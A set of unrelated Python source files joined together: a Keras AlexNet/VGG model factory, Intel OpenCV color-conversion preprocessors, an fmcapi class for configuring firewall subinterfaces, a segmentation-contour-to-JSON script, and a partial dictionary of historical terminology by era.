Parameters from:
github.com/akrizhevsky/cuda-convnet2/blob/master/layers/
"""
# Creating initializer, optimizer and the regularizer ops
initializer = keras.initializers.RandomNormal(0.0, 0.01)
regularizer = keras.regularizers.l2(5e-4)
if input_shape[2] == 1:
input_shape = (input_shape[0], input_shape[1], input_shape[2],)
else:
input_shape = (input_shape[0], input_shape[1], input_shape[2],)
# Creating the model
model = tf.compat.v1.keras.Sequential(
[
keras.layers.Conv2D(
64, 11, 4,
padding='same',
activation=tf.nn.relu,
kernel_initializer=initializer,
kernel_regularizer=regularizer,
input_shape=input_shape,
data_format='channels_last'
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Conv2D(
192, 5,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Conv2D(
384, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.Conv2D(
256, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.Conv2D(
256, 3,
padding='same',
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.relu
),
keras.layers.MaxPooling2D(
2, 2, padding='valid'
),
keras.layers.Flatten(),
keras.layers.Dropout(0.3),
keras.layers.Dense(
classes_num,
kernel_initializer=initializer,
kernel_regularizer=regularizer,
activation=tf.nn.softmax
)
]
)
return model
def scheduler(epoch):
"""
Learning rate scheduler
"""
lr = 0.0001
if epoch > 25:
lr = 0.00001
elif epoch > 60:
lr = 0.000001
print('Using learning rate', lr)
return lr
def create_model(model_name, input_shape, classes_num):
if model_name == "alexnet":
model = alexnet(input_shape, classes_num)
elif model_name == "vgg16":
# https://keras.io/zh/applications/
base_model = keras.applications.vgg16.VGG16(include_top=False, weights=None,
input_shape=input_shape)
x = base_model.output
x = keras.layers.GlobalAveragePooling2D()(x)
predictions = keras.layers.Dense(classes_num, activation="softmax")(x)
model = keras.models.Model(inputs=base_model.input, outputs=predictions)
elif model_name == "vgg19":
base_model = keras.applications.vgg19.VGG19(include_top=False, weights=None,
input_shape=input_shape)
x = base_model.output
x = keras.layers.GlobalAveragePooling2D()(x)
predictions = keras.layers.Dense(classes_num, activation="softmax")(x)
model = keras.models.Model(inputs=base_model.input, outputs=predictions)
else:
raise Exception("No such model: {}".format(model_name))
return model
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cv2
import numpy as np
from ..config import NumberField, BoolField
try:
import tensorflow as tf
except ImportError as import_error:
tf = None
from .preprocessor import Preprocessor
class BgrToRgb(Preprocessor):
__provider__ = 'bgr_to_rgb'
def process(self, image, annotation_meta=None):
def process_data(data):
return cv2.cvtColor(data, cv2.COLOR_BGR2RGB)
image.data = process_data(image.data) if not isinstance(image.data, list) else [
process_data(fragment) for fragment in image.data
]
return image
class BgrToGray(Preprocessor):
__provider__ = 'bgr_to_gray'
def process(self, image, annotation_meta=None):
image.data = np.expand_dims(cv2.cvtColor(image.data, cv2.COLOR_BGR2GRAY).astype(np.float32), -1)
return image
class RgbToBgr(Preprocessor):
__provider__ = 'rgb_to_bgr'
def process(self, image, annotation_meta=None):
def process_data(data):
return cv2.cvtColor(data, cv2.COLOR_RGB2BGR)
image.data = process_data(image.data) if not isinstance(image.data, list) else [
process_data(fragment) for fragment in image.data
]
return image
class RgbToGray(Preprocessor):
__provider__ = 'rgb_to_gray'
def process(self, image, annotation_meta=None):
image.data = np.expand_dims(cv2.cvtColor(image.data, cv2.COLOR_RGB2GRAY).astype(np.float32), -1)
return image
class TfConvertImageDType(Preprocessor):
__provider__ = 'tf_convert_image_dtype'
def __init__(self, config, name):
super().__init__(config, name)
if tf is None:
raise ImportError('*tf_convert_image_dtype* operation requires TensorFlow. Please install it before usage')
tf.enable_eager_execution()
self.converter = tf.image.convert_image_dtype
self.dtype = tf.float32
def process(self, image, annotation_meta=None):
converted_data = self.converter(image.data, dtype=self.dtype)
image.data = converted_data.numpy()
return image
class SelectInputChannel(Preprocessor):
__provider__ = 'select_channel'
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters['channel'] = NumberField(value_type=int, min_value=0)
return parameters
def configure(self):
self.channel = self.get_value_from_config('channel')
def process(self, image, annotation_meta=None):
def process_data(data):
return data[:, :, self.channel, np.newaxis]
if isinstance(image.data, list):
image.data = [process_data(item) for item in image.data]
else:
image.data = process_data(image.data)
return image
class BGR2YUVConverter(Preprocessor):
__provider__ = 'bgr_to_yuv'
color = cv2.COLOR_BGR2YUV
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'split_channels': BoolField(
optional=True, default=False, description='Allow treat channels as independent input'
)
})
return parameters
def configure(self):
self.split_channels = self.get_value_from_config('split_channels')
def process(self, image, annotation_meta=None):
data = image.data
yuvdata = cv2.cvtColor(data, self.color)
if self.split_channels:
y = yuvdata[:, :, 0]
u = yuvdata[:, :, 1]
v = yuvdata[:, :, 2]
identifier = image.data
new_identifier = ['{}_y'.format(identifier), '{}_u'.format(identifier), '{}_v'.format(identifier)]
yuvdata = [np.expand_dims(y, -1), np.expand_dims(u, -1), np.expand_dims(v, -1)]
image.identifier = new_identifier
image.data = yuvdata
return image
class RGB2YUVConverter(BGR2YUVConverter):
__provider__ = 'rgb_to_yuv'
color = cv2.COLOR_RGB2YUV
|
"""Sub-interfaces Classes."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
from fmcapi.api_objects.device_services.devicerecords import DeviceRecords
from fmcapi.api_objects.object_services.securityzones import SecurityZones
from fmcapi.api_objects.device_services.physicalinterfaces import PhysicalInterfaces
import logging
class SubInterfaces(APIClassTemplate):
"""The Subinterface Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"mode",
"enabled",
"MTU",
"managementOnly",
"ipAddress",
"subIntfId",
"vlanId",
"macLearn",
"ifname",
"securityZone",
"arpConfig",
"ipv4",
"ipv6",
"macTable",
"enableAntiSpoofing",
"fragmentReassembly",
"enableDNSLookup",
"activeMACAddress",
"standbyMACAddress",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + ["device_name"]
VALID_CHARACTERS_FOR_NAME = """[.\w\d_\-\/\. ]"""
PREFIX_URL = "/devices/devicerecords"
URL_SUFFIX = None
REQUIRED_FOR_POST = ["name", "subIntfId", "MTU"]
REQUIRED_FOR_PUT = ["id", "device_id"]
VALID_FOR_IPV4 = ["static", "dhcp", "pppoe"]
VALID_FOR_MODE = ["INLINE", "PASSIVE", "TAP", "ERSPAN", "NONE"]
VALID_FOR_MTU = range(64, 9000)
def __init__(self, fmc, **kwargs):
"""
Initialize SubInterfaces object.
Set self.type to "SubInterface" and parse the kwargs.
:param fmc (object): FMC object
:param **kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for SubInterfaces class.")
self.parse_kwargs(**kwargs)
self.type = "SubInterface"
def parse_kwargs(self, **kwargs):
"""
Parse the kwargs and set self variables to match.
:return: None
"""
super().parse_kwargs(**kwargs)
logging.debug("In parse_kwargs() for SubInterfaces class.")
if "device_name" in kwargs:
self.device(device_name=kwargs["device_name"])
if "ipv4" in kwargs:
if list(kwargs["ipv4"].keys())[0] in self.VALID_FOR_IPV4:
self.ipv4 = kwargs["ipv4"]
else:
logging.warning(
f"""Method "{kwargs['ipv4']}" is not a valid ipv4 type."""
)
if "mode" in kwargs:
if kwargs["mode"] in self.VALID_FOR_MODE:
self.mode = kwargs["mode"]
else:
logging.warning(f"""Mode "{kwargs['mode']}" is not a valid mode.""")
if "MTU" in kwargs:
if kwargs["MTU"] in self.VALID_FOR_MTU:
self.MTU = kwargs["MTU"]
else:
logging.warning(
f"""MTU "{kwargs['MTU']}" should be in the range 64-9000."""
)
self.MTU = 1500
def device(self, device_name):
"""
Associate device to this subinterface.
:param device_name: (str) Name of device.
:return: None
"""
logging.debug("In device() for SubInterfaces class.")
device1 = DeviceRecords(fmc=self.fmc)
device1.get(name=device_name)
if "id" in device1.__dict__:
self.device_id = device1.id
self.URL = f"{self.fmc.configuration_url}{self.PREFIX_URL}/{self.device_id}/subinterfaces"
self.device_added_to_url = True
else:
logging.warning(
f'Device "{device_name}" not found. Cannot set up device for SubInterfaces.'
)
def sz(self, name):
"""
Assign Security Zone to this subinterface.
:param name: (str) Name of Security Zone.
:return: None
"""
logging.debug("In sz() for SubInterfaces class.")
sz = SecurityZones(fmc=self.fmc)
sz.get(name=name)
if "id" in sz.__dict__:
new_zone = {"name": sz.name, "id": sz.id, "type": sz.type}
self.securityZone = new_zone
else:
logging.warning(
f'Security Zone, "{name}", not found. Cannot add to SubInterfaces.'
)
def static(self, ipv4addr, ipv4mask):
"""
Assign static IP to this bridge subinterface.
:param ipv4addr: (str) x.x.x.x
:param ipv4mask: (str) bitmask
:return: None
"""
logging.debug("In static() for SubInterfaces class.")
self.ipv4 = {"static": {"address": ipv4addr, "netmask": ipv4mask}}
def dhcp(self, enableDefault=True, routeMetric=1):
"""
Configure this subinterface with DHCP for addressing.
:param enableDefault: (bool) Accept, or not, a default route via DHCP.
:param routeMetric: (int) Set route metric.
:return: None
"""
logging.debug("In dhcp() for SubInterfaces class.")
self.ipv4 = {
"dhcp": {
"enableDefaultRouteDHCP": enableDefault,
"dhcpRouteMetric": routeMetric,
}
}
def p_interface(self, p_interface, device_name):
"""
Define which physical interface on which device is a part of this subinterface.
:param p_interfaces: (str) Name of physical interface.
:param device_name: (str) Name of device with that interface.
:return: None
"""
logging.debug("In p_interface() for SubInterfaces class.")
intf1 = PhysicalInterfaces(fmc=self.fmc)
intf1.get(name=p_interface, device_name=device_name)
if "id" in intf1.__dict__:
self.name = intf1.name
if "MTU" not in self.__dict__:
self.MTU = intf1.MTU
else:
logging.warning(
f'PhysicalInterface, "{intf1.name}", not found. Cannot add to SubInterfaces.'
)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 18 19:04:04 2021
@author: Admin
"""
import os
import json
import cv2
from contouring_semantic_segmentation import*
# ignore the background since we do not want to contour the background!
# This assumes that it is jpeg
class_dictionary = {'concrete':1, 'steel':2, 'metal decking':3}
output_textfile_destination = "output.txt"
def make_ohev_list(one_hot_encoded_vector_dir):
ohev_list_array = []
for image_name in os.listdir(one_hot_encoded_vector_dir):
ohev_list_array.append(image_name)
return ohev_list_array
ohev_directory = './ohev/'
image_dir = './masks/'
ohev_list_array = make_ohev_list(ohev_directory)
complete_contours = {}
# expects a jpeg for the image file-type, but could easily be modified for a png
for image_name in ohev_list_array:
ohev_file_name = ohev_directory + image_name
image_file_name = image_dir + image_name.split('.')[-2]+'.png'
for class_name in class_dictionary:
complete_class_contours = contour_class(ohev_file_name, image_file_name, image_name, class_dictionary[class_name], class_name)
if complete_class_contours == None:
print(class_name + ': not present on image')
else:
complete_contours[class_name] = complete_class_contours
# ------------------------------------------------------------------------
# TODO:
# CONVERT complete_contours TO JSON
# ------------------------------------------------------------------------
#print(complete_contours)
def keypoints_to_text(destination, keypoints, img):
#width, height = image.shape[0:2]
#condense_array_to_oneline = str(keypoints).replace('\n', '').replace(" ", "").replace("'", "").replace("array", "").replace("(", "").replace(")", "")
VERSION_NUMBER = "4.5.6"
with open(destination, 'w') as f:
f.write("version:4.5.6\n")
f.write("shapes:\n")
for index in keypoints:
pars = keypoints[index]
for i in range(len(pars)):
f.write("label:")
f.write(index)
f.write("\n")
f.write("points:")
for entry in pars[i]:
for x,y in entry:
f.write("[")
f.write(str(x))
f.write(",")
f.write(str(y))
f.write("]")
f.write("\n")
f.write("group_id:null\n")
f.write("shape_type:polygon\n")
f.write("flags:{}\n")
f.write("imagePath:")
f.write(image_file_name)
f.write("\n")
f.write("imageData:")
f.write("none\n")
width,height,channels = img.shape
f.write("imageHeight:")
f.write(str(height))
f.write("\n")
f.write("imageWidth:")
f.write(str(width))
f.write("\n")
f.close()
def text_to_json(destination, text_file):
dictionary = {}
shape_dict = {}
with open(text_file) as tr:
for line in tr:
key,data = line.strip().split(":",1)
print(key, " = ", data)
if key == "version":
dictionary[key] = data
elif key == "shapes":
dictionary.setdefault("shapes",[])
elif key == "points":
## TODO fix points to be int instead of string
#data = data.replace("[", "").replace("]", "")
points_list = data.replace("[","").split("]")
points_list.pop()
points = []
for item in points_list:
x,y = item.split(",")
points.append([float(x),float(y)])
shape_dict[key] = points
elif key == "flags":
shape_dict[key] = data
dictionary["shapes"].append(shape_dict)
shape_dict = {}
elif key == "imagePath":
dictionary[key] = data
elif key == "imageData":
dictionary[key] = data
elif key == "imageHeight":
dictionary[key] = int(data)
elif key == "imageWidth":
dictionary[key] = int(data)
else:
shape_dict[key] = data
out_file = open(destination, "w")
json.dump(dictionary, out_file, indent = 4, sort_keys = False)
out_file.close()
img = cv2.imread(image_file_name)
keypoints_to_text(output_textfile_destination, complete_contours, img)
text_to_json("out.json", "output.txt")
|
def getHistoricalTerminologyDict():
history_terminology = {
"Stone Age": [
"Stone Age",
"prehistoric",
"cave paintings",
"Paleolithic",
"Mesolithis",
"Neolithic",
"stone",
"Old Stone",
"Middle Stone Age",
"New Stone Age",
"Parietal Art",
"Nomad"
],
"Ancient Mesopotamia": [
"Ancient Mesopotamia",
"Mesopotamia",
"Chalcolithic civilization",
"Chalcolithic",
"Mesopotamian cultures",
"Eridu economy",
"Eridu",
"invention of writing",
"Writing",
"Sumerian",
"Sumerian period",
"prehistorical Ubaid",
"Uruk periods",
"theocratic",
"casting",
"cuneiform",
"early civilisation"
],
"Bronze Age": [
"Bronze Age",
"prehistoric",
"metals",
"use of bronze",
"bronze technology",
"bronze alloy",
"bronze",
"tin mining",
"tin",
"foil",
"copper",
"molten copper",
"tools",
"smelting",
"trade",
"trade networks"
],
"Old Kingdom": [
"Old Kingdom",
"Ancient Egypt",
"Egypt",
"Age of Pyramids",
"Egyptian pyramid",
"Egyptian pyramids",
"pyramid",
"pyramids",
"Pyramid of Djoser",
"Great Pyramid at Giza",
"Great Pyramid of Giza",
"Pyramid of Khafre",
"Pyramid of Menkaure",
"Giza Pyramid",
"Giza Pyramid Complex",
"Giza Necropolis",
"Great Pyramid",
"Great Sphinx",
"scribes",
"hieroglyphs",
"dynasties",
"Third Dynasty",
"Fourth Dynasty",
"Fifth Dynasty",
"Sixth Dynasty",
"Seventh Dynasty",
"pharaohs",
"pharaoh",
"Sneferu",
"Khufu",
"trade",
"trade ships",
"nomes",
"nomarch",
"nomarchs",
"tombs",
"tomb",
"temples",
"temple",
"Egyptian gods",
"gods",
"early civilisation",
"polytheistic"
],
"Indus Valley Civilisation": [
"Indus Valley Civilisation",
"Indus script",
"Harappan Civilisation",
"Harappa",
"Harappan language",
"Mohenjo-daro",
"Dholavira",
"Ganeriwala",
"Rakhigarhi",
"Indus civilisation",
"Bronze Age",
"South Asia",
"Indus River",
"early civilisation"
],
"Middle Kingdom": [
"Middle Kingdom",
"Middle Kingdom of Egypt",
"Egypt",
"The Period of Reunification",
"Period of Reunification",
"ancient Egypt",
"Mentuhotep II",
"Nephepetre",
"Merneferre Ay",
"egyptian pharaohs",
"egyptian pharaoh",
"pharaohs",
"pharaoh",
"Eleventh Dynasty",
"Thebes",
"Twelfth Dynasty",
"el-Lisht",
"Thirteenth Dynasty",
"Eleventh Dynasty",
"Eleventh Dynasty",
"Dynasties",
"Osiris",
"deity",
"tombs",
"slavery",
"slaves",
"Egyptian gods",
"gods",
"polytheistic"
],
"Shang Dynasty": [
"Shang dynasty",
"Yin dynasty",
"dynasty",
"Chinese dynasty",
"China",
"traditional Chinese history",
"Yellow River",
"Ruins of Yin",
"Shang Capital",
"tombs",
"palaces",
"ritual sites",
"animal sacrifice",
"human sacrifice",
"jade",
"bronze",
"stone",
"bone",
"ceramic",
"artifacts",
"Anyang site",
"Chinese writing",
"divinations",
"oracle bones",
"chinese civilization"
],
"New Kingdom": [
"New Kingdom",
"New Kingdom of Egypt",
"Egypt",
"Egyptian Empire",
"ancient Eyptian history",
"ancient Egypt",
"Eighteenth Dynasty",
"Nineteenth Dynasty",
"Twentieth Dynasty",
"Ramesside period",
"Ramesses",
"Ramesses I",
"pharaohs",
"pharaoh",
"Hittite",
"Hittite armies",
"war",
"Kushites",
"polytheistic"
],
"Vedic Period": [
"Vedic period",
"Vedic age",
"India",
"Vedas",
"influential Brahmanical ideology",
"Brahmanical ideology",
"Kuru Kingdom",
"Indo-Aryan",
"Indo-Aryan tribes",
"Indo-Aryan culture",
"Vedic culture",
"patriarchal",
"patrilineal",
"Punjab",
"tribes",
"pastoralism",
"kingdoms",
"Srauta",
"Sruti",
"Vedic orthodoxy",
"orthodox sacrificial ritual",
"mahajanapadas",
"sramana",
"Jainism",
"Buddhism",
"hierarchy",
"social classes",
"Brahmanical orthodoxy",
"Hindu synthesis",
"Hinduism",
"Ochre Coloured Pottery culture",
"Gandhara grave culture",
"Swat culture",
"Swat protohistoric",
"Graveyards Complex",
"black and red ware culture",
"Painted Grey Ware culture"
],
"Zhou Dynasty": [
"Zhou Dynasty",
"Chinese Dynasty",
"China",
"Chinese History",
"Ji",
"Ji royal house",
"Western Zhou",
"Eastern Zhou",
"Spring and Autumn period",
"Warring States period",
"Qin state",
"Qin",
"Qin Dynasty",
"Chinese bronzeware",
"Confucianism",
"Ruism",
"Taoism",
"Daoism",
"Legalism",
"Fajia",
"written chinese",
"clerical script",
"chancery script",
"Warring States period"
],
"Iron Age": [
"Iron Age",
"prehistory",
"protohistory",
"iron",
"production of iron",
"production of steel",
"iron tools",
"tools"
],
"Ancient Greece": [
"Ancient Greece",
"civilization",
"Greek history",
"Greek Dark Ages",
"antiquity",
"classical antiquity",
"Classical Greece",
"Greco-Roman World",
"Mycenaean Greece",
"polis",
"poleis",
"Archaic period",
"Archaic Greece",
"colonization of the Mediterranean Basin",
"colonies in Antiquity",
"Greco-Persian Wars",
"Alexander the Great",
"Alexander III of Macedon",
"Hellenistic civilization",
"Hellenistic period",
"Hellenistic kings",
"conquests",
"conquest",
"Greece in the Roman era",
"Roman Greece",
"Achaea",
"Achaia",
"Greek culture",
"culture of Greece",
"Greek philosophy",
"foundation of modern Western culture",
"cradle of Western civilization",
"Greek architecture",
"Greek literature",
"first democracy",
"democracy",
"ecclesia",
"citizen's assembly",
"slavery",
"slaves",
"Homer",
"tragedy",
"lyric poet",
"lyric poetry",
"Greek gods",
"gods",
"polytheistic",
"Greek astronomy",
"Greek mathematics",
"ancient Greek medicine",
"ancient Greek technology"
],
"Jomon Period": [
"Jomon Period",
"Japanese prehistory",
"hunter-gatherer culture",
"hunter-gatherer",
"sedentism",
"jomon",
"tools",
"jewlery",
"bone",
"stone",
"shell",
"antler",
"pottery"
],
"Mahajanpadas": [
"Mahajanpadas",
"first republic",
"republic",
"Vajji",
"Vrijji",
"Mithila region",
"Mithila",
"Tirhut",
"TirabhuktiMahananda River",
"Vaishali",
"Vesali",
"Anga Kingdom",
"Pataliputra",
"Nanda clan",
"Magadha"
],
"Ancient Rome": [
"Ancient Rome",
"roman civilization",
"the Romans",
"romans",
"Rome",
"Western Roman Empire",
"Roman Kingdom",
"Roman Republic",
"Roman Empire",
"Italic people",
"Italic people settlement",
"one of the largest empires",
"largest empires",
"ancient world",
"Roman monarchy",
"regal period of ancient rome",
"elective monarchy",
"democratic",
"pure democracy",
"direct democracy",
"res publica",
"republic",
"classic republic",
"classical republicanism",
"civic humanism",
"autocracymilitary dictatorship",
"conquest",
"invasion",
"Romanization",
"Latinization",
"cultural assimilation",
"antiquity",
"classical antiquity",
"Greco-Roman World",
"Ancient Roman architecture",
"aqueductsRoman technology",
"Punic Wars",
"Siege of Carthage",
"Roman-Persian Wars",
"Roman-Parthian Wars",
"Trajan",
"mos maiorum",
"Republican mores and traditions",
"mores and traditions",
"Palmyrene Empire",
"Imperial Crisis",
"Crisis of the Third Century",
"Military Anarchy",
"Tetrarchy",
"Gaius Marius",
"Lucius Cornelius Sulla",
"Lucius Julius Caesar",
"Lucius Cornelius Cinna",
"Catilinarian conspiracy",
"Lucius Sergius Catilina",
"Catiline",
"Gaius Julius Caesar",
"First Triumvirate",
"Second Triumvirate",
"Quintus Tullius Cicero",
"Cicero",
"Julio-Claudian dynasty",
"Flavian dynasty",
"Nerva-Antonine dynasty",
"Severan dynasty",
"Augustus",
"Tiberus",
"Nero",
"Roman Egypt",
"Battle of Actium",
"polytheistic"
],
"Mayan Civilisation": [
"Mayan Civilisation",
"Maya civilization",
"Mesoamerican civilization",
"Maya peoples",
"Mayas",
"logosyllabic script",
"Maya script",
"Maya glyphs",
"pre-Columbian era",
"Ancient Maya art",
"Maya architecture",
"Maya numeral system",
"Maya calendar",
"Maya astronomy",
"Archaic period",
"Maya cities",
"city of Tikal",
"Tikal",
"city of Calakmul",
"Calakmul",
"Chichen Itza",
"Teotihuacan",
"classic Maya collapse",
"K'iche' kingdom",
"Nojpeten",
"Spanish Empire",
"mesoamerican pyramids",
"pyramid-temples",
"Maya pyramids",
"Maya stelae",
"human sacrifice",
"Maya culture"
],
"Yayoi Period": [
"Yayoi period",
"Yayoi",
"Yayoi pottery",
"paddy fields",
"intensive rice agriculture",
"rice agriculture",
"metallurgy",
"metal",
"artifacts",
"Yayoi culture",
"farmers",
"Yayoi People",
"bronze",
"iron"
],
"Moche Civilisation": [
"Moche Civilisation",
"Moche culture",
"Peru",
"autonomous polities",
"Moche architecture",
"Moche iconography",
"irrigation",
"metalwork",
"weaving",
"mold technology",
"ceramic art"
],
"Coptic Period": [
"Coptic Period",
"Roman Egypt",
"Byzantine Egypt",
"Egyptian culture",
"ancient Egyptian religion",
"polytheistic",
"Coptic Christianity",
"Coptic Orthodox Church",
"Muslim conquest of Egypt",
"decline of Christianity",
"Christianity",
"Islam"
],
"Kofun Period": [
"Kofun period",
"Yamato period",
"Japan",
"kofun",
"Buddhism",
"Chinese writing system",
"Imperial House"
],
"Gupta Empire": [
"Gupta Empire",
"Ancient Indian Empire",
"Ancient India",
"Golden Age of India",
"king Sri Gupta",
"Sri Gupta",
"Gupta",
"Chandragupta I",
"Samudragupta",
"Chandragupta II",
"Vikramaditya",
"Classical Sanskrit",
"Indic language",
"Indo-Aryan language",
"Kalidasa",
"conquests",
"Parasikas",
"Persians",
"Hunas",
"Huna",
"Kambojas",
"Kinnaras",
"Kiratas",
"Kirat",
"Mahabharata",
"Ramayana",
"Kalidasa",
"Aryabhata",
"Varahamihira",
"Vatsyayana",
"Puranas",
"invasions"
],
"Anglo Saxon Period": [
"Anglo Saxon Period",
"Anglo-Saxon Period",
"Romano-British leaders",
"Romano-British",
"Anglo-Saxon mercenaries",
"Anglo-Saxon",
"Old English",
"Anglo-Saxons",
"foederati",
"Flavius Aetius",
"British and Anglo-Saxon wars",
"Britons",
"Battle of Mount Badon",
"Battle of Mons Badonicus",
"Anglo-Saxon Chronicle",
"Migration period",
"Barbarian Invasions",
"Laws of Ine",
"co-existence",
"invasion",
"seven principal Anglo-Saxon kingdoms",
"seven Anglo-Saxon kingdoms",
"Anglo-Saxon kingdoms",
"Anglo-Saxon England heptarchy",
"heptarchy",
"Vikings",
"Great Heathen Army",
"Battle of Edington"
],
"Srivijaya Period": [
"Srivijaya Period",
"Sri Vijaya",
"Sriwijaya",
"Buddhist thalassocratic Indonesian empire",
"Indonesian empire",
"thalassocracy",
"thalattocracy",
"Buddhist",
"island of Sumatra",
"Sumatra",
"unified kingdom",
"Indonesian archipelago",
"islands of Indonesia",
"Srivijayan Empire",
"Maritime Silk Road",
"Maritime Silk Route",
"trade",
"Kedukan Bukit inscription",
"hegemon",
"hegemony",
"Javanese Singhasari empire",
"Majapahit empire"
],
"Chenla Kingdom": [
"Chenla",
"Chenla Kingdom",
"Zhenla",
"late 6th century",
"6th century",
"7th century",
"8th century",
"9th century",
"early 9th century",
"aristocracy",
"Dângrêk Chieftains",
"principalities",
"confederation of principalities",
"principality",
"conquests",
"Kingdom of Funan",
"Funana",
"martime trade routes",
"maritime trade",
"trade",
"epigraphic system",
"adoption of epigraphic system",
"Harihara",
"divine kingship",
"divine monarchy",
"Land Chenla",
"Water Chenla",
"Shailendra dynasty",
"thalassocracy",
"thalattocracy",
"Java",
"Srivijaya",
"Sumatra",
"Jayavarman II",
"Khmer Empire"
],
"Kingdom of the Sunda": [
"Kingdom of the Sunda",
"Sunda Kingdom",
"Sundanese Hindu kingdom",
"Pamali River",
"Serayu River",
"Pakuan Pajajaran",
"Sundanese",
"Tarumanagara",
"Sunda",
"Hinduism",
"king Tarusbawa",
"Tarusbawa",
"Sunda Kelapa"
],
"Golden Age of Islam": [
"Golden Age of Islam",
"Islam Golden Age",
"8th century",
"9th century",
"10th century",
"11th century",
"12th century",
"13th century",
"14th century",
"Abbasid Caliphate",
"Harun al-Rashid",
"House of Wisdom",
"Grand Library of Baghdad",
"Islamic scholars",
"polymaths",
"Arabic",
"Persian",
"Farsi",
"translated all of the world's classical knowledge",
"classical knowledge",
"world's classical knowledge",
"translation",
"Mongol invasions",
"Mongol invasions and conquests",
"conquests",
"Siege of Baghdad",
"Islamic middle ages",
"revolutionized",
"historic inventions",
"Timurid Renaissance",
"Timurid Empire"
],
"Nara Period": [
"Nara Period",
"Nara",
"Empress Genmei",
"Empress Genmyo",
"Heijo-kyo",
"Emperor Kanmu",
"Emperor Kammu",
"Nagaoka-kyo",
"Heian-kyo",
"Shintoism",
"Shinto",
"Kami-no-michi",
"agicultural",
"kami",
"Chinese influence",
"Chinese writing",
"Chinese fashion",
"Chinese Buddhism"
],
"Pala Empire": [
"Pala Empire",
"India",
"Pala",
"dynasty",
"Mahayana",
"Tantric",
"Buddhism",
"Gopala",
"emperor of Gauda",
"election of Gopala",
"war elephant",
"elephantry",
"military conquerors",
"diplomats",
"classical Indian philosophy",
"Indian philosophy",
"Indian literature",
"Indian painting",
"Indian sculpture",
"Somapura Mahavihara",
"Nalanda",
"university of Nalanda",
"Vikramashila",
"university of Vikramashila",
"Bengali",
"Bengala",
"trade",
"relations",
"Srivijaya Empire",
"Tibetan Empire",
"Abbasid Caliphate",
"Dharmapala",
"Emperor Dharmapala",
"Emperor Devapala",
"Devapala",
"Emperor Ramapala",
"Ramapala",
"Emperor Mahipala I",
"Sena dynasty",
"Sena empire",
"golden era",
"Bengali golden era",
"Charyapada"
],
"Kingdom of Mataram": [
"Kingdom of Mataram",
"Medang Kingdom",
"Mataram Kingdom",
"King Sanjaya",
"Sailendra dynasty",
"Sailendra",
"agriculture",
"rice culture",
"rice farming",
"maritime trade",
"trade",
"classical Javanese art",
"classical Javanese architecture",
"candi",
"Kalasan",
"Sewu",
"Borobudur",
"Prambanan",
"Buddhist",
"Shailendra dynasty",
"Balaputradewa",
"Shivaist",
"Sanjaya dynasty",
"Rakai Pikatan",
"civil wars",
"civil war",
"Medang Empire divided",
"division of Medang Empire",
"Wurawari",
"Watugaluh",
"Kahuripan kingdom",
"Airlangga"
],
"Viking Age": [
"Viking Age",
"Norsemen",
"Vikings",
"large-scale raiding",
"colonizing",
"colonized",
"colonization",
"conquest",
"trading",
"Scandinavians",
"Norse people",
"Varangians",
"Europe",
"North America",
"Norse-Gaels",
"Normans",
"Rus' people",
"Faroese",
"Icelanders",
"kingdoms",
"earldoms",
"kingdom of the Isles",
"Earldom of Orkney",
"York",
"Danelaw",
"Dublin",
"Duchy of Normandy",
"Kievan Rus'",
"Kyivan Rus",
"North Sea Empire",
"Anglo-Scandinavian Empire",
"unification of Norway",
"Carolingian Empire",
"Saxon Wars",
"Sailing innovations"
],
"Khmer Empire": [
"Khmer Empire",
"Angkor Empire",
"Khmer people",
"Hindu",
"Buddhist",
"Hindu-Buddhist Empire",
"Funan Empire",
"Chenla Empire",
"Angkor",
"City of Angkor",
"Angkor Wat",
"Bayon",
"largest pre-industrial urban centre",
"pre-industrial urban centre",
"King Jayavarman II",
"chakravartin",
"universal ruler"
],
"Chimu Culture": [
"Chimu culture",
"Chimor",
"Chan Chan",
"Moche Valley",
"Valley of Moche",
"Late Intermediate Period",
"Peru",
"Agriculture",
"fishing",
"Chimu economy",
"Moon Worshipping",
"chimu",
"Spondylus shells",
"copper",
"gold",
"silver",
"bronze",
"tumbaga",
"kiln"
],
"Medieval Period": [
"Medieval Period",
"Middle Ages",
"Europe",
"fall of the Western Roman Empire",
"Early Middle Ages",
"High Middle Ages",
"Late Middle Ages",
"Migration Period",
"monastary",
"Christians",
"Christian",
"Christianization",
"christianise",
"pagan Europe",
"pagan",
"Franks",
"Carolingian dynasty",
"Carolingian Empire",
"Vikings",
"Vikings invasion",
"Magyars",
"hungarian invasions",
"Magyar invasions",
"Saracens",
"Saracen invasions",
"trade",
"technological innovations",
"agricultural innovations",
"Medieval Warm Period",
"Medieval Climate Optimum",
"Medieval Climatic Anomaly",
"Manorialism",
"seignoralism",
"nobles",
"noble",
"peasant",
"peasants",
"feudalism",
"knight",
"knights",
"knighthood",
"crusades",
"crusade",
"Holy land",
"muslims",
"Christendom",
"scholasticism",
"Thomas Aquinas",
"paintings of Giotto",
"Giotto",
"Giotto di Bondone",
"poetry of Dante",
"Dante Alighieri",
"Dante",
"poetry of Chaucer",
"Geoffrey Chaucer",
"Chaucer",
"Marco Polo",
"Gothic architecture",
"Gothic",
"Chartres Cathedral",
"Cathedral of our Lady of Chartres",
"famine",
"plague",
"Black Death",
"war",
"heresy",
"Western Schism",
"Papal Schism",
